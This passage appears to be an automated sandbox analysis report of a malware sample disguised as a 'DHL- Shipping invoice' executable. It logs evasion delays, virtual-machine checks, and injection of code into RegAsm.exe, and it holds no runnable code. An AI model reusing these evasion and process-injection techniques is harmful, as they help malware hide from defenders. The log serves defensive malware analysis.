                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exe TID: 7060Thread sleep time: -99339s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exe TID: 7060Thread sleep time: -99169s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exe TID: 7060Thread sleep time: -99030s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exe TID: 7060Thread sleep time: -98921s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exe TID: 7060Thread sleep time: -98791s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exe TID: 7060Thread sleep time: -98671s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exe TID: 7060Thread sleep time: -98562s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -200000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44684Thread sleep count: 6201 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -99874s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44684Thread sleep count: 3577 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -99750s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -99640s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -99531s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -99421s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -99304s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -99171s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -99045s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -98933s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -98828s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -98718s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -98605s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -99875s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -99765s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -99645s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -99516s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -99391s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -99281s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -99172s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -99062s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -98953s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -98843s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -98729s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -98621s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -98492s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -98390s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -98281s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -98172s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -1199906s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -1199794s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -1199687s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -1199547s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -1199436s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -1199328s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -1199218s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -1199109s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -1199000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -1198860s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -1198735s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -1198594s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -1198483s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -1198375s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -1198220s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -1198078s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -1197969s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -1197844s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -1197734s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -1197625s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -1197501s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -1197375s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -1197266s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -1197116s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 44672Thread sleep time: -1197015s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeThread delayed: delay time: 99890Jump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeThread delayed: delay time: 99779Jump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeThread delayed: delay time: 99671Jump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeThread delayed: delay time: 99561Jump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeThread delayed: delay time: 99452Jump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeThread delayed: delay time: 99339Jump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeThread delayed: delay time: 99169Jump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeThread delayed: delay time: 99030Jump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeThread delayed: delay time: 98921Jump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeThread delayed: delay time: 98791Jump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeThread delayed: delay time: 98671Jump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeThread delayed: delay time: 98562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99874Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99640Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99421Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99304Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99171Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99045Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98933Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98605Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99645Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99516Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99391Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98843Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98729Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98621Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98492Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1199906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1199794Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1199687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1199547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1199436Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1199328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1199218Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1199109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1199000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1198860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1198735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1198594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1198483Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1198375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1198220Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1198078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1197969Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1197844Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1197734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1197625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1197501Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1197375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1197266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1197116Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1197015Jump to behavior
                Source: Amcache.hve.5.drBinary or memory string: VMware
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: RegAsm.exe, 00000002.00000002.2907225813.0000000005B90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                Source: Amcache.hve.LOG1.5.dr, Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.LOG1.5.dr, Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43E000Jump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000Jump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 6BC008Jump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exeJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Users\user\Desktop\DHL- Shipping invoice.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
